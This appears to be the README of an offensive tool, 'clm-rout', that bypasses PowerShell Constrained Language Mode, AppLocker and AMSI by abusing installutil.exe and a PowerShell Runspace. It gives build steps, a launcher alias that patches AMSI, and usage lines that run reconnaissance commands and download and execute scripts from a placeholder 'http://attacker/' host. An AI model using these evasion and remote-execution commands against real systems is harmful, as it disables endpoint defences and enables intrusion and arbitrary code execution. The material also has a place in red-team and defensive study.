An all-in-one bypass for PowerShell Constrained Language Mode
(CLM
), AppLocker
and Antimalware Scan Interface
(AMSI
) using Runspace.
- Evade
AppLocker
. - Evade
CLM
. - Patch
AMSI
via the/pacth
command switch. - Execute command(s) via the
/cmd=<cmd>
command switch. - Load and execute remotely hosted script(s) via the
/url=<http(s)://foo.bar/foobar>
command switch. - Output the results of commands/scripts (supports
stdout
andstderr
).
-
Clone/download
clm-rout
:git clone https://github.com/aress31/clm-rout
-
Build the project with
Visual Studio 2022
.
- (Recommended) Create an "alias":
function run {
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe `
/uninstall /logfile= /LogToConsole=false `
/patch $Args `
C:\users\foo\CLMRout.exe
}
-
Execute command(s):
run /cmd="hostname; whoami"
-
Execute remote script(s):
run /script="http://attacker/script1.ps1; http://attacker/script2.ps1"
-
Execute remote script(s) followed by command(s):
run /cmd="hostname; whoami" /script="http://attacker/script1.ps1; http://attacker/script2.ps1"
If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next (cup of coffee ☕/lamborghini 🚗) - as a lot of my personal time went into creating this project. 😪
It is easy, all you got to do is press the Sponsor
button at the top of this page or alternatively click this link. 😁
Found a bug 🐛? I would love to squash it!
Please report all issues on the GitHub issues tracker.
You would like to contribute to better this project? 🤩
Please submit all PRs
on the GitHub pull requests tracker.
clm-rout
is distributed under the terms of the BSD 3
.
See LICENSE for details.